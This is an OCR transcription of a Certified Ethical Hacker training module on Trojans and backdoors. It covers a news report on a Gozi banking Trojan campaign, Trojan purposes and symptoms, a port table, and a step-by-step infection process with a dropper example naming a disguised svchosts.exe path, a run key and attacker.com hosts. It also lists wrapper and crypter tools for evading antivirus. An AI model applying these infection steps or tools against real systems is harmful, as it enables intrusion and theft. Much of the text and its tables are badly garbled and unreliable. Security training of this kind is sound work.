Trojans and Backdoors

Transcription

Trojans and B ackdoors
M o d u le 0 6
E th ic a l H a c k in g a n d C o u n t e r m e a s u r e s
E x a m 3 1 2 - 5 0 C e r t if ie d E th ic a l H a c k e r
T r o ja n s a n d B a c k d o o r s
T r o j a n s
a n d
B a c k d o o r s
M o d u le
0 6
Engineered by Hackers. Presented by Professionals.
C E H
E t h ic a l H a c k in g a n d C o u n t e r m e a s u r e s v 8
M
o d u le
0 6 : T r o ja n s
E x a m
M o d u le 0 6 P a g e 8 2 8
a n d
B a c k d o o rs
3 1 2 -5 0
E th ic a l H a c k in g a n d C o u n t e r m e a s u r e s C o p y r ig h t ©
b y E C - C 0 U n C il
A l l R i g h t s R e s e r v e d . R e p r o d u c t i o n is S t r i c t l y P r o h i b i t e d .
S e c u r it y
N e w
s
1 1 1 1 1
1 1 1 U i
1
■
PCMAG.COM
C y b e r-C rim in a ls Plan M a s s iv e
T ro ja n A t ta c k on 30 B a n k s
Troian T yp es
Indication of
Troian
Trojan
D etection
Troian H orse
C onstruction
Kit
Oct 05, 2012 1:24 PM EST
A large-scale coordinated Trojan attack to launch fraudulent wire transfers may be headed your way. And it
has nothing to do with the recent wave of denial-of-service attacks.
A group of cybercriminals appear to be actively recruiting up to 100 botmasters to participate in a
complicated man-in-the-middle hijacking scam using a variant of the Gozi Trojan, RSA's FraudAction
research team said in a blog post yesterday. The team put together the warning after weeks of monitoring
underground chatter.
As many as 30 financial institutions in the United States may be targeted in this "blitzkrieg-like" series, said
Mor Ahuvia, a cyber-crime communications specialist at RSA FraudAction. It's possible these well-known and
high-profile institutions were selected, not because of "anti-American motives," but simply because American
banks are less likely to have deployed two-factor authentication for private banking consumers, Ahuvia said.
European banks generally require all consumers to use two-factor for wire transfers, making it harder to
launch a man-in-the-middle session hijacking attack.
h t t p : / / s e c u r it y w a t c h . p c m a g . c o m
Copyright © by EG-Gouncil. All Rights Jtes'en/fed.;Reproduction is Strictly Prohibited.
^
S e c u r it y N e w s
amps
‫״־‬
‫יי‬- fjfg g C y b e r - C r i m i n a l s P l a n M a s s i v e T r o j a n A t t a c k o n 3 0
Banks
Source: http://securitvwatch.pcmag.com
A large-scale coordinated Trojan attack to launch fraudulent wire transfers may be headed
your way. And it has nothing to do with the recent wave of denial-of-service attacks.
A group of cybercriminals appears to be actively recruiting up to 100 botmasters to participate
in a complicated man-in-the-middle hijacking scam using a variant of the Gozi Trojan, RSA's
FraudAction research team said in a blog post recently. The team put together the warning
after weeks of monitoring underground chatter.
As many as 30 financial institutions in the United States may be targeted in this "blitzkrieg-like"
series, said Mor Ahuvia, a cyber-crime communications specialist at RSA FraudAction. It's
possible these well-known and high-profile institutions were selected, not because of "antiAmerican motives," but simply because American banks are less likely to have deployed twofactor authentication for private banking consumers, Ahuvia said. European banks generally
require all consumers to use two-factor for wire transfers, making it harder to launch a man-inthe-middle session hijacking attack.
M o d u le 0 6 P a g e 8 2 9
"A cyber gang has recently communicated its plans to launch a Trojan attack spree on 30
American banks as part of a large-scale orchestrated crimeware campaign," Ahuvia said.
Potential targets and relevant law enforcement agencies have already been notified, RSA said.
RSA FraudAction was not sure how far along the recruitment campaign has gone, or when the
attacks are expected. While it's possible revealing the gang's plans may cause the criminals to
scuttle their operation, it may just cause the group to modify the attack.
"There are so many Trojans available and so many points of failure in security that could go
wrong, that they'd still have some chance of success," Ahuvia said.
Anatomy of the Attack
The proposed cyber-attack consists of several parts. The first part involves infecting victim
computers with the variant of the Gozi Trojan, which RSA has dubbed Gozi Prinimalka, Once
the computer has been compromised, it will communicate with the botmaster's computer,
which has a "virtual machine syncing module," capable of duplicating the victim's PC settings,
such as the time zone, screen resolution, cookies, browser type, and installed software IDs, into
a virtual machine, RSA said.
When the attacker accesses victim accounts using the cloned system, the virtual machine
appears to be a legitimate system using the last-known IP address for the victim's computer,
RSA said. This cloning module would make it easy for the attackers to log in and initiate wire
transfers. The attackers also plan to use VoIP phone flooding software to prevent victims from
receiving confirmation calls or texts verifying online account transfers and activity, RSA said.
The recruits have to make an initial investment in hardware and agree to training on how to
deploy the Gozi Trojan, Ahuvia wrote. They will receive executable files, but not the compilers
used to create the Trojan. In return, the new partners in this venture will receive a cut of the
profits.
Trojan Behind Previous Attacks
The Trojan is not as well-known as others, such as SpyEye or Citadel, nor is it as widely
available, Ahuvia said. Its relative obscurity means antivirus and security tools are less likely to
flag it as malicious.
RSA has linked the Gozi Trojan to previous attacks responsible for more than $5 million in
losses in the United States in 2008. The researchers have linked the Trojan to a group called the
HangUp Team, and speculated the same group was behind this latest campaign.
The way the attack is structured, it is very likely the targeted institutions won't even realize
they'd been affected till at least a month or two after the attacks. "The gang will set a prescheduled D-day to launch its spree, and attempt to cash out as many compromised accounts
as possible before its operations are ground to a halt by security systems," Ahuvia said.
M o d u le 0 6 P a g e 8 3 0
Copyright 1996-2012 Ziff Davis, Inc.
By Author: Fahmida Y
. Rashid
h t t p : / / s e c u r it v w a t c h . p c m a g . c o m / n o n e / B 0 3 5 7 7 - c v b e r - c r im in a ls - p la n - r r 1 a s s iv e - t r o ia n - a t t a c k - o n 3 0 -b a n k s
M o d u le 0 6 P a g e 8 3 1
M
o d u le
O
b j e c t iv e s
C E H
J
W h a t Is a T ro ja n ?
J
T yp es o f T ro ja n s
J
W h a t D o T ro ja n C re a to rs Lo ok For
J
T ro ja n A n a lysis
J
In d ic a tio n s o f a T ro ja n A tta c k
J
H o w to D e te c t T ro ja n s
J
C o m m o n P o rts use d b y T ro ja n s
J
T ro ja n C o u n te rm e a s u re s
J
H o w to In fe c t S ystem s U sing a T ro ja n
J
T ro ja n H o rse C o n s tru c tio n K it
D iffe r e n t W ays a T ro ja n can G e t in to a
J
A n ti-T ro ja n S o ftw a re
J
^
S ystem
J
J
H o w t o D e p lo y a T ro ja n
Pen T e stin g fo r T ro ja n s an d
B a ckd o o rs
1
I
ly
tz<
J--------------- 1
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le O b je c t iv e s
The main objective of this module is to provide you with knowledge about various
kinds of Trojans and backdoors, the way they propagate or spread on the Internet, symptoms
of these attacks, consequences of Trojan attacks, and various ways to protect network or
system resources from Trojans and backdoor. This module also describes the penetration
testing process to enhance your security against Trojans and backdoors.
This module makes you familiarize with:
e
What Is a Trojan?
© Types of Trojans
© What Do Trojan Creators Look For?
0
© Indications of a Trojan Attack
© How to Detect Trojans
e
Common Ports Used by Trojans
© Trojan Countermeasures
0
How to Infect Systems Using a Trojan
© Trojan Horse Construction Kit
0
Different Ways a Trojan Can Get into a
System
© Anti-Trojan Software
0
How to Deploy a Trojan
M o d u le 0 6 P a g e 8 3 2
Trojan Analysis
© Pen Testing for Trojans and Backdoors
M
o d u le
F lo w
C E H
Penetration Testing
Trojan Concepts
Anti-Trojan
Software
Trojan Infection
Countermeasures
Types of Trojans
Hg y
Trojan Detection
M o d u le F lo w
To understand various Trojans and backdoors and their impact on network and
system resources, let's begin with basic concepts of Trojans. This section describes Trojans and
highlights the purpose of Trojans, the symptoms of Trojan attacks, and the common ports used
by Trojans.
Trojan Concepts
,‫• נ‬
Trojans Infection
f| j| | ‫ ־‬Anti-Trojan Software
Types of Trojans
^
■4
^—
v‫— ׳‬
1
‫׳׳‬
Countermeasures
1
Penetration Testing
Trojan Detection
M o d u le 0 6 P a g e 8 3 3
C E H
J
It is a program in which th e malicious or harmful
code is contained inside apparently harmless
programming or data in such a way th at it can
get control and cause dam age, such as ruining
th e file allocation table on your hard disk
J
Trojans replicate, spread, and get activated upon
users' certain predefined actions
J
With the help of a Trojan, an attacker gets
access to the stored passwords in the Trojaned
com puter and would be able to read personal
docum ents, delete files and display pictures,
and/or show m essages on the screen
. .
Send me credit card details
Victim in Chicago
infected with Trojan
Here is my credit card num ber and expire date
Send me Facebook account inform ation
Victim in London
Here is my Facebook login and profile
Send me e-banking login info
Victim in Paris
Here is my bank ATM and pincode
W h a t Is a T ro ja n ?
According to Greek mythology, the Greeks won the Trojan War by entering in to the
fortified city of Troy hiding in a huge, hollow wooden horse. The Greeks built a huge wooden
horse for their soldiers to hide in. They left the horse in front of the gates of Troy. The Trojans
thought it to be a gift from the Greeks, who had withdrawn from the war, and so they
transported the horse into their city. At night, the Spartan soldiers broke through the wooden
horse, and opened the gates for their soldiers who eventually destroyed the city of Troy.
Taking a cue from Greek mythology, a computer Trojan is defined as a "malicious, securitybreaking program that is disguised as something benign." A computer Trojan horse is used to
enter a victim's computer undetected, granting the attacker unrestricted access to the data
stored on that computer and causing immense damage to the victim. For example, a user
downloads what appears to be a movie or a music file, but when he or she runs it, it unleashes
a dangerous program that may erase the unsuspecting user's disk and send his or her credit
card numbers and passwords to a stranger. A Trojan can also be wrapped into a legitimate
program, meaning that this program may have hidden functionality that the user is unaware of.
In another scenario, a victim may also be used as an intermediary to attack others—without his
or her knowledge. Attackers can use the victim's computer to commit illegal denial-of-service
attacks such as those that virtually crippled the DALnet IRC network for months on end.
M o d u le 0 6 P a g e 8 3 4
(DALnet is an Internet relay chat (IRC) network that is a form of instant communication over the
network.)
Trojan horses work on the same level of privileges that the victim user has. If the victim had the
privileges, Trojan can delete files, transmit information, modify existing files, and install other
programs (such as programs that provide unauthorized network access and execute privilegeelevation attacks). The Trojan horse can attempt to exploit a vulnerability to increase the level
of access beyond that of the user running the Trojan horse. If successful, the Trojan horse can
operate with increased privileges and may install other malicious codes on the victim's
machine.
A compromise of any system on a network may affect the other systems on the network.
Systems that transmit authentication credentials such as passwords over shared networks in
clear text or in a trivially encrypted form are particularly vulnerable. If a system on such a
network is compromised, the intruder may be able to record user names and passwords or
other sensitive information.
Additionally, a Trojan, depending on the actions it performs, may falsely implicate the remote
system as the source of an attack by spoofing and, thereby, cause the remote system to incur
liabilities.
Send me credit card details
Here is my credit card number and expire date
;y ::!D y
Victim in Chicago
Send me Facebook account Information
Victim in London
Here is my Facebook login and profile
Send me e-banking login info
I
Here is my bank ATM and pincode
t
j
I
»‫ י‬J
Victim in Paris
FIGURE 6.1: Attacker extracting sensitive information from the system's infected with Trojan
M o d u le 0 6 P a g e 8 3 5
C o m m u n ic a t io n
a n d
P a th s : O v e rt
O vert C hannel
J
J
E H
C o v e r t C h a n n e ls
A le g itim a te c o m m u n ic a tio n
C overt C hannel
J
A n u n a u th o r iz e d c h a n n e l used
p a th w ith in a c o m p u te r syste m ,
f o r tra n s fe r rin g s e n s itiv e da ta
o r n e tw o rk , f o r tra n s fe r o f d a ta
w ith in a c o m p u te r syste m , o r
n e tw o rk
E x a m p le o f o v e rt c h a n n e l
in c lu d e s g a m e s o r an y
le g itim a te p ro g ra m s
Poker.exe
(Legitimate Application)
J
T h e s im p le s t fo r m o f c o v e rt
c h a n n e l is a T ro ja n
*
^
Trojan.exe
(Keylogger Steals Passwords)
n ^
C o m m u n ic a t io n P a th s : O v e r t a n d C o v e r t C h a n n e ls
Overt means something that is explicit, obvious, or evident, whereas covert means
something that is secret, concealed, or hidden. An overt channel is a legal, secure channel for
the transfer of data or information within the network of a company. This channel is within the
secure environment of the company and works securely for the transfer of data and
information.
On the other hand, a covert channel is an illegal, hidden path used to transfer data from a
network. Covert channels are methods by which an attacker can hide data in a protocol that is
undetectable. They rely on a technique called tunneling, which allows one protocol to be
carried over another protocol. Covert channels are generally not used for information
exchanges, so they cannot be detected by using standard system security methods. Any
process or bit of data can be a covert channel. This makes it an attractive mode of transmission
for a Trojan, since an attacker can use the covert channel to install the backdoor on the target
machine.
M o d u le 0 6 P a g e 8 3 6
Overt Channel
Covert Channel
A legitimate communication path within a
computer system, or network, for the
transfer of data
A channel that transfers information
within a computer system, or network, in
a way that violates the security policy
An overt channel can be exploited to
create the presence of a covert channel by
selecting components of the overt
channels with care that are idle or not
related
The simplest form of covert channel is a
Trojan
TABLE 6 .1 : C o m p a ris o n b e tw e e n O v e rt C h a n n e l a n d C o v e rt C ha n n e l
M o d u le 0 6 P a g e 8 3 7
P u r p o s e
o f T r o j a n s
D elete o r re p la c e o p e ra tin g system 's
C E H
D isable fire w a lls and a n tiv iru s
c ritic a l file s
G e n e ra te fa k e tr a ffic to c re a te DOS
C reate b a c k d o o rs to gain re m o te
a ttacks
access
D o w n lo a d s p y w a re , a d w a re , and
In fe c t v ic tim 's PC as a p ro x y s e rv e r
m a lic io u s file s
fo r re la yin g a ttacks
Record s c re e n s h o ts , a u d io , and v id e o
Use v ic tim 's PC as a b o tn e t to
o f v ic tim 's PC
p e rfo rm DD 0 S a ttacks
Steal info rm atio n such as passwords,
security codes, credit card inform ation
Use v ic tim 's PC fo r s p a m m in g and
b la s tin g e m a il m essages
using keyloggers
Copyright © by EG-Gtancil. All Rights Reserved. Reproduction is Strictly Prohibited
a. ’*
P u rp o s e o f T ro ja n s
I I
Trojan horses are the dangerous malicious programs that affect computer systems
without the victim's knowledge. The purpose of Trojan is to:
0
Delete or replace the operating system's critical files
0
Generate fake traffic to create DOS attacks
0
Download spyware, adware, and malicious files
0
Record screenshots, and audio and video of the victim's PC
0
Steal information such as passwords, security codes, and credit card information using
keyloggers
0
Disable firewalls and antivirus software
0
Create backdoors to gain remote access
0
Infect a victim's PC as a proxy server for relaying attacks
0
Use a victim's PC as a botnet to perform DDoS attacks
0
Use a victim's PC for spamming and blasting email messages
M o d u le 0 6 P a g e 8 3 8
W h a t D o T ro ja n
L o o k
C re d it card
in fo rm a tio n
C re a to rs
C E H
F o r
F in a n cia l d a ta (b a n k a c c o u n t
n u m b e rs , so cia l s e c u rity n u m b e rs ,
in s u ra n c e in fo r m a tio n , e tc .)
U sing th e v ic tim 's c o m p u te r fo r ille g a l p urposes,
such as to hack, scan, flo o d , o r in filtr a te o th e r
m achin e s on th e n e tw o rk o r In te rn e t
V IS A
H acker
^ W h a t D o T ro ja n C re a to rs L o o k F o r?
Trojans are written to steal information from other systems and to exercise control
over them. Trojans look for the target's personal information and, if found, return it to the
Trojan writer (attacker). They can also allow attackers to take full control over a system.
Trojans are not solely used for destructive purposes; they can also be used for spying on
someone's machine and accessing private and/or sensitive information.
Trojans are created for the following reasons:
9
To steal sensitive information, such as:
© Credit card information, which can be used for domain registration, as well as for
shopping.
9
Account data such as email passwords, dial-up passwords, and web services
passwords. Email addresses also help attackers to spam.
9
Important company projects including presentations and work-related papers could
be the targets of these attackers, who may be working for rival companies.
M o d u le 0 6 P a g e 8 3 9
9
Attackers can use the target's computers for storing archives of illegal materials, such as
child pornography. The target can continue to use their computer, and have no idea
about the illegal activities for which their computer is being used.
© Attackers can use the target computer as an FTP Server for pirated software.
0
Script kiddies may just want to have fun with the target's system. They might plant a
Trojan in the system, which then starts acting strangely: the CD tray opens and closes
frequently, the mouse functions improperly, etc.
Q The compromised system might be used for other illegal purposes, and the target would
be held responsible for all illegal activities, if the authorities discover them.
<
H acker
FIGURE 6 .2 : H a c k e r s te a lin g c re d it ca rd in fo r m a tio n fr o m v ic tim
M o d u le 0 6 P a g e 8 4 0
I n d ic a t io n s
o f a T r o ja n
A tta c k
C E H
CD-ROM drawer opens and closes
by itself
Abnormal activity by the modem,
network adapter, or hard drive
Computer browser is redirected
to unknown pages
The account passwords are
changed or unauthorized access
‫ש‬
Strange chat boxes appear on
victim's computer
Strange purchase statements
appear in the credit card bills
Documents or messages are
printed from the printer
themselves
The ISP complains to the victim
that his/her computer is IP
scanning
Functions of the right and left
mouse buttons are reversed
People know too much personal
information about a victim
*
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited
^ ‫ך־‬
I n d ic a t io n s o f a T r o ja n A t t a c k
A Trojan is software designed to steal data and demolish your system. It creates a
backdoor to attackers to intrude into your system in stealth mode. The system becomes
vulnerable to the Trojan and attackers can easily launch their attack on the system if it is not
safeguarded. Trojans can enter your system using various means such as email attachments,
downloads, instant messages, open ports, etc. The following are some of the indications that
you may notice on your system when it is attacked by the Trojan:
0
CD-ROM drawer opens and closes by itself
0
Computer browser is redirected to unknown pages
0
Strange chat boxes appear on target's computer
0
Documents or messages are printed from the printer
0
Functions of the right and left mouse buttons are reversed
0
Abnormal activity by the modem, network adapter, or hard drive
0
The account passwords are changed or unauthorized access
0
Strange purchase statements appear in the credit card bills
0
The ISP complains to the target that his or her computer is IP scanning
0
People know too much personal information about a target
M o d u le 0 6 P a g e 8 4 1
I n d ic a t io n s
o f a T ro ja n
A tta c k
(Cont’d)
A n tiv iru s is
d is a b le d o r
d o e s n o t w o rk
The taskbar
disappears
W in d o w s c o lo r
s e ttin g s cha nge
p ro p e r ly
S cree nsaver's
s e ttin g s c ha nge
a u to m a tic a lly
The computer
shuts down
and powers off
by itself
g ‫ןן‬
q
(•Itlfwtf
|
Itklttl IU(kM
Computer
screen flips
upside down
or inverts
Wallpaper or
background
settings
change
C trl+ A lt+ D e l
s to p s w o rk in g
Copyright © by EC-CMICil. All Rights Reserved. Reproduction is Strictly Prohibited.
I n d ic a t io n s o f a T r o ja n A t t a c k ( C o n t ’ d )
Though Trojans run in stealth mode, they exhibit some characteristics, observing which; you
can determine the existence of Trojans on your computer. The following are typical symptoms of a
Trojan horse virus infection:
9
Antivirus software is disabled or does not work properly
9
The taskbar disappears
9
Windows color settings change
9
Computer screen flips upside down or inverts
9
Screensaver's settings change automatically
9
Wallpaper or background settings change
9
Windows Start button disappears
9
Mouse pointer disappears or moves by itself
9
The computer shuts down and powers off by itself
9
Ctrl+Alt+Del stops working
9
Repeated crashes or programs open/close unexpectedly
9
The computer monitor turns itself off and on
M o d u le 0 6 P a g e 8 4 2
C o m m o n
P o rts u s e d
b y T ro ja n s
C E H
UrtifM IthKJl IlM
kM
Port
2
20
21
22
23
25
31
80
Trojan
Trojan
Port
Death
FTP99CMP
Senna Spy
Shivka-Burka
Blade Runner, Doly Trojan, Fore,
Invisible FTP, WebEx, WinCrash
1807
Trojan
Port
5569
6670-71
6969
SpySender
Robo-Hack
22222
Prosiak
GateCrasher, Priority
23456
Evil FTP, Ugly FTP
Shockrave
Remote Grab
Tiny Telnet Server
BackDoor 1.00-1.03
N etM onitor
Terminator, WinPC, WinSpy,
2001
7789
Trojan Cow
ICKiller
Ripper
BackOfrice 2000
NetSpy DK
Bugs
Portal of Doom
BOWhack
TCP W rappers trojan
2140
The Invasor
9989
iNi-Killer
Hackers Paradise
2155
Illusion Mailer, Nirvana
10607
Coma 1.0.9
lni*Killer, Phase Zero, Stealth Spy
3129
Masters Paradise
11000
11223
Senna Spy
Progenic trojan
12223
Hack'99 Keylogger
1170
Satanz Backdoor
The Invasor
Silencer, WebEx
WinCrash
Doly Trojan
4567
File Nail 1
RAT
4590
ICQTrojan
Psyber Stream Server, Voice
5000
Bubbel
Ultors Trojan
5001
5321
Sockets de Troie
SubSeven 1 .0 -1 .8
1245
NetSphere 1.27a
31337-38 Back Orifice, DeepBO
Executor
421
1 666
Delta
Hackers Paradise
456
m m
K Z S H
GirlFriend 1.0, Beta-1.35
DeepThroat
Shaft
Antigen, Email Password Sender,
Trojan
Port
VooDoo Doll
Firehotcker
5400-02 Blade Runner
12345-46 GabanBus, NetBus
12361,
Whack‫־‬a‫־‬mole
12362
16969
20001
20034
Priority
M illennium
NetBus 2.0, BetaNetBus 2.01
33333
34324
40412
40421-26
47262
50505
50766
53001
Prosiak
BigGluck, TN
The Spy
Masters Paradise
Delta
Sockets de Troie
Fore
Remote Windows
Shutdown
54321
61466
Telecommando
65000
Devil
SchoolBus .69-1.11
Copyright © by EG-GtOIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
C o m m o n P o rts U s e d b y T ro ja n s
IP ports play an important role in connecting your computer to the Internet and
surfing the web, downloading information and files, running software updates, and sending and
receiving emails and messages so that you can connect to the world. Each computer has unique
sending and receiving ports for each function.
Users need to have a basic understanding of the state of an "active connection" and ports
commonly used by Trojans to determine if the system has been compromised.
There are different states, but the "listening" state is the important one in this context. This
state is generated when a system listens for a port number when it is waiting to make a
connection with another system. Trojans are in a listening state when a system is rebooted.
Some Trojans use more than one port as one port may be used for "listening" and the other(s)
for data transfer.
M o d u le 0 6 P a g e 8 4 3
P o rt
T ro ja n
P o rt
2
20
Death
Senna Spy
Blade Runner, Doly Trojan, Fore,
Invisible FTP, WebEx, WinCrash
1492
1600
FTP99CMP
Shivka-Burka
1807
SpySender
1981
1999
Shockrave
BackDoor 1.00 1.03
21
22
23
T ro ja n
■®®■‫■■■■■י‬
P o rt
5569
6670-71
6969
7000
7300-08
T ro ja n
Robo Hack
DeepThroat
Gatecrasher, Priority
31
SO
2023
2115
421
TCP Wrappers trojan
2140
The Invasor
9989
iNi-Killer
Hackers Paradise
Ini-Killer, Phase Zero, Stealth Spy
Satanz Backdoor
Silencer, WebEx
Doly Trojan
RAT
2155
3129
3150
4092
4567
4590
Illusion Mailer, Nirvana
Masters Paradise
The Invasor
WinCrash
File Nail 1
ICQTrojan
10607
11000
11223
Coma 1.0.9
Senna Spy
Progenic trojan
Psyber Stream Server, Voice
5000
Rubbol
sockets de Trole
Firehotcker
12361,
12362
16969
20001
Blade Runner
20034
1170
1234
ultors Trojan
5001
1243
SubSeven 1.0-1.8
5321
V00D00 Doll
5400-02
Evil FTP, Ugly FTP
31337-38 Back Orifice, DeepBO
Ripper
456
555
666
1001
1011
1095-98
23456
ICKiller
Trojan Cow
Bugs
22222
26274
Delta
30100-02 NetSphere 1.27a
2001
7789
T ro ja n
GlrlFriend 1.0, Beta 1.35
Prosiak
Remote Grab
NetMonitor
Shaft
Tiny Telnet Server
Antigen, Email Password Sender,
Terminator, WinPC, WinSpy,
Hackers Paradise
Executor
25
P o rt
21544
8787
BackOfrice 2000
9872-9875 Portal of Doom
Hack’‘)‘) KeyLogger
12223
12345-46 GabanRus, NetBus
31339
31666
NetSpy DK
BOWhack
33333
Prosiak
34324
40412
40421-26
47262
50505
50766
BigGluck.TN
The Spy
Masters Paradise
Delta
Sockets de Troie
Fore
Priority
54321
Remote Windows
Shutdown
SchoolBus .69-1.11
Millennium
NetBus 2.0, Beta
NetBus 2.01
61466
Telecommando
65000
Devil
Whack-a-mole
53001
TABLE 6 .2 : C o m m o n p o rts use d b y T ro ja n s
M o d u le 0 6 P a g e 8 4 4
M
o d u le
F lo w
C E H
UrtifM IthKJi NmIm
So far we have discussed various Trojan concepts. Now we will discuss Trojan
infections.
Trojan Concepts
y—
v‫׳‬
Countermeasures
Trojan Infection
|||||r Anti-Trojan Softwares
Types of Trojans
^
) Penetration Testing
—
* ‫ ר‬Trojan Detection
In this section, we will discuss the different methods adopted by the attacker for installing
Trojans on the victim's system and infecting their system with this malware.
M o d u le 0 6 P a g e 8 4 5
H o w
to I n f e c t S y s t e m s U s in g
a
T ro ja n
process
£
J U
C reate a n e w Trojan p a cke t using a T ro ja n H orse
C o n s tru c tio n K it
S
f
C reate a d ro p p e r, w h ic h is a p a rt in a tro ja n iz e d pa cket
th a t in sta lls th e m a lic io u s co d e on th e ta rg e t system
a
E x a m p le o f a D r o p p e r
In sta lla tio n path: c \ w i n d o w s \ s y s t e m 3 2 \ s v c h o s t s . e x e
AlitO Start: H K L M \ S o £ t w a r e \ M l c
\r u n \le x p lo r e r . e x e
e
O 1.. 0 ‫׳‬
A tta c k e r
M a lic io u s C ode
M a lic io u s c o d e
C lie n t a d d re s s : c lie n t.a tta c k e r.c o m
D ro p z o n e : d ro p z o n e .a tta c k e r.c o m
A g e n u in e a p p lic a tio n
W ra p p e r
File n a m e : chess.exe
W ra p p e r d a ta : E x e c u ta b le file
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
mi■1"HI
H o w to I n f e c t S y s t e m s U s in g a T r o ja n
An attacker can control the hardware as well as software on the system remotely by
installing Trojans. When a Trojan is installed on the system, not only does the data become
vulnerable to threats, chances are that the attacker can perform attacks on the third-party
system. Attackers infect the system using Trojans in many ways:
0
Trojans are included in bundled shareware or downloadable software. When a user
downloads those files, Trojans are installed onto the systems automatically.
9
Users are tricked with the different pop-up ads. It is programmed by the attacker in
such a way that it doesn't matter if is the user clicks YES or NO; a download starts and
the Trojan is installed onto the system automatically.
0
Attackers send Trojans through email attachments. When those attachments are
opened, the Trojan is installed on the system.
Users are sometimes tempted to click on different kinds of files such as greeting cards,
porn videos, images, etc., where Trojans are silently installed one the system.
M o d u le 0 6 P a g e 8 4 6
The step-by-step process for infecting machines using a Trojan is as follows:
Step 1: Create a new Trojan packet using a Trojan Horse Construction Kit.
Step 2: Create a dropper, which is a part in a Trojanized packet that installs the malicious code
on the target system.
n
Example of a Dropper
s
In s t a lla tio n p a th : c \ w i n d o w s \ s y s t e m 3 2 \ s v c h o s t s . e x e
A u to s t a r t: H K IiM \S o ftw a r e \M i.c ...... \ r u n \ I e 3 
W ra p p e r
File name: c h e s s .e x e
Wrapper data: Executable file
FIGURE 6 .3 : Illu s tr a tin g th e pro ce ss o f in fe c tin g m a c h in e s u sing T ro ja n s (1 o f 2)
M o d u le 0 6 P a g e 8 4 7
H o w
to I n f e c t S y s t e m s U s in g
T ro ja n
(C ont’d)
a
C E H
C rea te a w ra p p e r u s ing w ra p p e r to o ls to
in s ta ll T ro ja n o n th e v ic tim 's c o m p u te r
P ro p a g a te t h e T r o ja n
g r | jr
H o w to I n f e c t S y s t e m s U s in g a T r o ja n ( C o n t ’ d )
Step 3: Create a wrapper using tools to install the Trojan on the victim's computer. By
using various tools like petite.exe, Graffiti.exe, EliteWrap, etc., a wrapper is created to install
the Trojan on the victim's computer.
Step 4: Propagate the Trojan. Computer virus propagation (spreading) can be done through
various methods:
0
An automatic execution mechanism is one method where traditionally it was spread
through floppy disks and is now spread through various external devices. Once the
computer is booted, the virus automatically spreads over the computer.
Q
Even viruses can be propagated through emails, Internet chats, network sharing, P2P file
sharing, network redirecting, or hijacking.
Step 5: Execute the Dropper. Dropper is used by attackers to disguise their malware. The user
is confused and believes that all the files are genuine or known files. Once it gets loaded into
the host computer, it helps other malware to get loaded and perform the task.
Step 6 : Execute the damage routine. Most computer viruses contain a Damage Routine that
delivers payloads. A payload sometimes just displays some images or messages whereas other
payloads can even delete files, reformat hard drives, or cause other damage.
M o d u le 0 6 P a g e 8 4 8
Dropper
- 1
1
. . . . . .
.........
>
Trojan Packet
‫־‬
‫־‬0
)
W w *■
11 ------
........
chess.exe
W ra p p e r
A tta c k e r
y
Dropper
drops the
Trojan
Trojan code execution
V ic tim 's S yste m
s
‫׳‬
FIGURE 6 .4 : Illu s tr a tin g th e pro ce ss o f in fe c tin g m a c h in e s u sing T ro ja n s (2 o f 2)
M o d u le 0 6 P a g e 8 4 9
b y E C - C 0 l1 n C il
W
r a p p e r s
C E H
A w ra p p e r b in d s a T ro ja n e x e c u ta b le w ith
an in n o c e n t lo o k in g .EXE a p p lic a tio n such
â s gam es o r o ffic e a p p lic a tio n s
/
Chess.exe
Che
Trojan.exe
P ilp c i
Filesize:
90K
F
ilp c i7 p • 7
0k
Filesize:
20K
Chess.exe
Filesize: 110K
‫־‬N
W h e n th e user runs th e
A tta c k e rs m ig h t send a b ir th d a y g re e tin g
w ra p p e d EXE, it firs t installs
th e Trojan in th e b ackg ro u nd
The tw o p ro g ra m s are
and th e n runs th e w ra p p in g
single file
a p p lica tio n in th e fo re g ro u n d
th a t w ill in s ta ll a Tro jan as th e user
w ra p p e d to g e th e r in to a
V.
w atc h e s , fo r e xam p le , a b irth d a y cake
d a n c in g across th e screen
J
Source: http://www.objs.com
Wrappers are used to bind the Trojan executable with a genuine-looking .EXE application such
as games or office applications. When the user runs the wrapped EXE, it first installs the Trojan
in the background and then runs the wrapping application in the foreground. The attacker can
compress any (DOS/WIN) binary with tools such as petite.exe. This tool decompresses an EXE
file (once compressed) on runtime. This makes it possible for the Trojan to get in virtually
undetected, since most antivirus software is not able to detect the signatures in the file.
The attacker can place several executables inside one executable, as well. These wrappers may
also support functions such as running one file in the background while another one is running
on the desktop.
Technically speaking, wrappers can be considered another type of software "glueware" used to
bind other software components together. A wrapper encapsulates into a single data source to
make it usable in a more convenient fashion than the original unwrapped source.
Users can be tricked into installing Trojan horses by being enticed or frightened. For instance, a
Trojan horse might arrive in an email described as a computer game. When the user receives
the mail, the description of the game may entice him or her to install it. Although it may, in fact,
be a game, it may also be taking other action that is not readily apparent to the user, such as
M o d u le 0 6 P a g e 8 5 0
deleting files or mailing sensitive information to the attacker. In another instance, wan attacker
sends a birthday greeting that will install a Trojan as the user watches, such as a birthday cake
dancing across the screen.
8tl
(W ? C h e s s .e x e
Filesize: 90K
T r o ja n .e x e
^
Filesize: 20K
Chess.exe
cness.exe
^
Filesize: 110K
FIGURE 6 .5 : W ra p p e rs
M o d u le 0 6 P a g e 8 5 1
Wrapper Covert Programs
C E H
Hte5ce [njarrio
vi TrOjaa.Net Advanced Hie Joiner
version 1.0
Ms. li'. All I rl1.3j‫־‬q •
1
Ec-rtlriji C::t»
FJt5«
rteujw!
|®I C ^Documtrt* aij
□c!D1c1‫״‬ifrtt 9rf[jSir?1
| !•Hr fl
'C n 'W .'U i. »»*>
I Hffi
56
SC8 LAB’S
Pronessonal MalwareTod
3««b
rfrr.fvli t
tndex ) Crrptor Binder Downloador [ Spreader
K rip to m a tik
Nome______| Poll‫_________________________!־‬
SC&Ub... C:\D0CUmemtsaridS(1M
ir1Qs\Ail111i .. No
.1 ^ d‘ j0 " " ‫| ־‬cument$
. V‫ ־־‬j
No |
Advanced File Joiner
|Theattachedfilesweigh714KB
SCB LAB's - Professional M a lw a re Tool
W ra p p e r C o v e rt P ro g ra m s
K r ip t o m a t ik
Kriptomatik is a wrapper covert program that is designed to encrypt and protect files
{
against crackers and antivirus software. It spreads via Bluetooth and allows you to burn
CD/DVDs with Autorun.
It has the following features:
0
Configure icons
0
Gather files
e
Posts
© Propagation
0
Other features such as autostart, attributes, encryption, etc.
